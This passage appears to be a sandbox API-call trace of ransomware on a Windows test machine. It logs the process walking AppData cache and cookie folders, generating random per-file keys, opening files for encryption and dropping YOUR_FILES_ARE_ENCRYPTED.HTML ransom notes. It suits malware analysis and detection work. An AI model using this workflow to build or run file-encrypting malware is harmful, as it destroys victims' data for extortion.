[0116.079] wsprintfW (in: param_1=0x19daf6, param_2="%02X" | out: param_1="D2") returned 2 [0116.079] wsprintfW (in: param_1=0x19dafa, param_2="%02X" | out: param_1="80") returned 2 [0116.079] wsprintfW (in: param_1=0x19dafe, param_2="%02X" | out: param_1="2A") returned 2 [0116.079] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O\\15_10.0.0[1].json" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O\\15_10.0.0[1].json") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O\\15_10.0.0[1].json" [0116.079] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.079] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0116.081] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d1d1d0a, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x2d1d1d0a, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x2d26e045, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x129d0, dwReserved0=0x19dc70, dwReserved1=0x7784abfa, cFileName="15_10.0.0[1].json", cAlternateFileName="15_100~1.JSO")) returned 0 [0116.081] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.084] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0116.084] GetProcessHeap () returned 0x600000 [0116.084] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\ac\\inetcache\\faxm6p1o\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.085] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.086] CloseHandle (hObject=0x31c) returned 1 [0116.086] GetProcessHeap () returned 0x600000 [0116.086] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.086] GetProcessHeap () returned 0x600000 [0116.086] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.087] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2551ddd9, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x2551ddd9, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2551ddd9, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName="TCKLQR58", cAlternateFileName="")) returned 1 [0116.087] StrStrIW (lpFirst="TCKLQR58", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.087] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58") returned 104 [0116.087] GetProcessHeap () returned 0x600000 [0116.087] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.088] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58" [0116.088] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58\\*" [0116.088] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2551ddd9, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x2551ddd9, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2551f0d8, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19dc70, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.089] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2551ddd9, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x2551ddd9, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2551f0d8, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19dc70, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0116.089] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2551f0d8, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x2551f0d8, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x255aca57, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x129e1, dwReserved0=0x19dc70, dwReserved1=0x7784abfa, cFileName="15_10.0.0[1].json", cAlternateFileName="15_100~1.JSO")) returned 1 [0116.089] StrStrIW (lpFirst="15_10.0.0[1].json", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.089] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58\\15_10.0.0[1].json") returned 122 [0116.089] PathFindExtensionW (pszPath="15_10.0.0[1].json") returned=".json" [0116.089] lstrlenW (lpString=".json") returned 5 [0116.089] PathFindExtensionW (pszPath="15_10.0.0[1].json") returned=".json" [0116.089] SystemFunction036 (in: RandomBuffer=0x19db44, RandomBufferLength=0x20 | out: RandomBuffer=0x19db44) returned 1 [0116.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58\\15_10.0.0[1].json" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\ac\\inetcache\\tcklqr58\\15_10.0.0[1].json"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0116.090] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19db68 | out: lpFileSize=0x19db68*=76257) returned 1 [0116.090] GetProcessHeap () returned 0x600000 [0116.090] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0116.092] wsprintfW (in: param_1=0x19da82, param_2="%02X" | out: param_1="38") returned 2 [0116.092] wsprintfW (in: param_1=0x19da86, param_2="%02X" | out: param_1="56") returned 2 [0116.092] wsprintfW (in: param_1=0x19da8a, param_2="%02X" | out: param_1="6C") returned 2 [0116.092] wsprintfW (in: param_1=0x19da8e, param_2="%02X" | out: param_1="AC") returned 2 [0116.092] wsprintfW (in: param_1=0x19da92, param_2="%02X" | out: param_1="E4") returned 2 [0116.092] wsprintfW (in: param_1=0x19da96, param_2="%02X" | out: param_1="36") returned 2 [0116.092] wsprintfW (in: param_1=0x19da9a, param_2="%02X" | out: param_1="3A") returned 2 [0116.092] wsprintfW (in: param_1=0x19da9e, param_2="%02X" | out: param_1="34") returned 2 [0116.092] wsprintfW (in: param_1=0x19daa2, param_2="%02X" | out: param_1="30") returned 2 [0116.092] wsprintfW (in: param_1=0x19daa6, param_2="%02X" | out: param_1="4D") returned 2 [0116.092] wsprintfW (in: param_1=0x19daaa, param_2="%02X" | out: param_1="32") returned 2 [0116.092] wsprintfW (in: param_1=0x19daae, param_2="%02X" | out: param_1="95") returned 2 [0116.092] wsprintfW (in: param_1=0x19dab2, param_2="%02X" | out: param_1="DD") returned 2 [0116.092] wsprintfW (in: param_1=0x19dab6, param_2="%02X" | out: param_1="3D") returned 2 [0116.092] wsprintfW (in: param_1=0x19daba, param_2="%02X" | out: param_1="AE") returned 2 [0116.092] wsprintfW (in: param_1=0x19dabe, param_2="%02X" | out: param_1="98") returned 2 [0116.092] wsprintfW (in: param_1=0x19dac2, param_2="%02X" | out: param_1="71") returned 2 [0116.092] wsprintfW (in: param_1=0x19dac6, param_2="%02X" | out: param_1="EB") returned 2 [0116.093] wsprintfW (in: param_1=0x19daca, param_2="%02X" | out: param_1="1D") returned 2 [0116.093] wsprintfW (in: param_1=0x19dace, param_2="%02X" | out: param_1="9C") returned 2 [0116.093] wsprintfW (in: param_1=0x19dad2, param_2="%02X" | out: param_1="22") returned 2 [0116.093] wsprintfW (in: param_1=0x19dad6, param_2="%02X" | out: param_1="58") returned 2 [0116.093] wsprintfW (in: param_1=0x19dada, param_2="%02X" | out: param_1="68") returned 2 [0116.093] wsprintfW (in: param_1=0x19dade, param_2="%02X" | out: param_1="F7") returned 2 [0116.093] wsprintfW (in: param_1=0x19dae2, param_2="%02X" | out: param_1="FE") returned 2 [0116.093] wsprintfW (in: param_1=0x19dae6, param_2="%02X" | out: param_1="23") returned 2 [0116.093] wsprintfW (in: param_1=0x19daea, param_2="%02X" | out: param_1="42") returned 2 [0116.093] wsprintfW (in: param_1=0x19daee, param_2="%02X" | out: param_1="2C") returned 2 [0116.093] wsprintfW (in: param_1=0x19daf2, param_2="%02X" | out: param_1="D4") returned 2 [0116.093] wsprintfW (in: param_1=0x19daf6, param_2="%02X" | out: param_1="77") returned 2 [0116.093] wsprintfW (in: param_1=0x19dafa, param_2="%02X" | out: param_1="F2") returned 2 [0116.093] wsprintfW (in: param_1=0x19dafe, param_2="%02X" | out: param_1="7F") returned 2 [0116.094] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58\\15_10.0.0[1].json" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58\\15_10.0.0[1].json") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58\\15_10.0.0[1].json" [0116.094] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.094] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0116.097] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2551f0d8, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x2551f0d8, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x255aca57, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x129e1, dwReserved0=0x19dc70, dwReserved1=0x7784abfa, cFileName="15_10.0.0[1].json", cAlternateFileName="15_100~1.JSO")) returned 0 [0116.097] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.097] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0116.097] GetProcessHeap () returned 0x600000 [0116.097] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\ac\\inetcache\\tcklqr58\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.098] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.099] CloseHandle (hObject=0x31c) returned 1 [0116.099] GetProcessHeap () returned 0x600000 [0116.099] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.099] GetProcessHeap () returned 0x600000 [0116.099] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.099] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2551ddd9, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x2551ddd9, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2551ddd9, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName="TCKLQR58", cAlternateFileName="")) returned 0 [0116.099] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0116.099] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0116.099] GetProcessHeap () returned 0x600000 [0116.099] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.100] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.101] CloseHandle (hObject=0x32c) returned 1 [0116.101] GetProcessHeap () returned 0x600000 [0116.101] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.101] GetProcessHeap () returned 0x600000 [0116.101] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.103] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf5050aa1, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x1d8b269b, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x1d8b269b, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0116.103] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.103] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCookies") returned 97 [0116.103] GetProcessHeap () returned 0x600000 [0116.103] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.104] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCookies" [0116.104] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0116.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf5050aa1, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x1d8b269b, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x1d8b269b, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.104] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf5050aa1, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x1d8b269b, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x1d8b269b, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName="..", cAlternateFileName="")) returned 1 [0116.104] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x1d8b269b, ftCreationTime.dwHighDateTime=0x1d70505, ftLastAccessTime.dwLowDateTime=0x1d8b269b, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x1d8b269b, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0116.104] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.104] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCookies\\container.dat") returned 111 [0116.104] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0116.104] lstrlenW (lpString=".dat") returned 4 [0116.104] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0116.104] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0116.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCookies\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\ac\\inetcookies\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0116.105] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=0) returned 1 [0116.105] CloseHandle (hObject=0x31c) returned 1 [0116.105] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x1d8b269b, ftCreationTime.dwHighDateTime=0x1d70505, ftLastAccessTime.dwLowDateTime=0x1d8b269b, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x1d8b269b, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec38, dwReserved1=0x62ee68, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0116.105] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.105] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0116.105] GetProcessHeap () returned 0x600000 [0116.105] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.106] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.107] CloseHandle (hObject=0x32c) returned 1 [0116.107] GetProcessHeap () returned 0x600000 [0116.107] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.107] GetProcessHeap () returned 0x600000 [0116.107] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.107] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf4fb829a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf4fb829a, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf4fb829a, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0116.107] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.107] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetHistory") returned 97 [0116.107] GetProcessHeap () returned 0x600000 [0116.107] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.107] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetHistory" [0116.107] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: 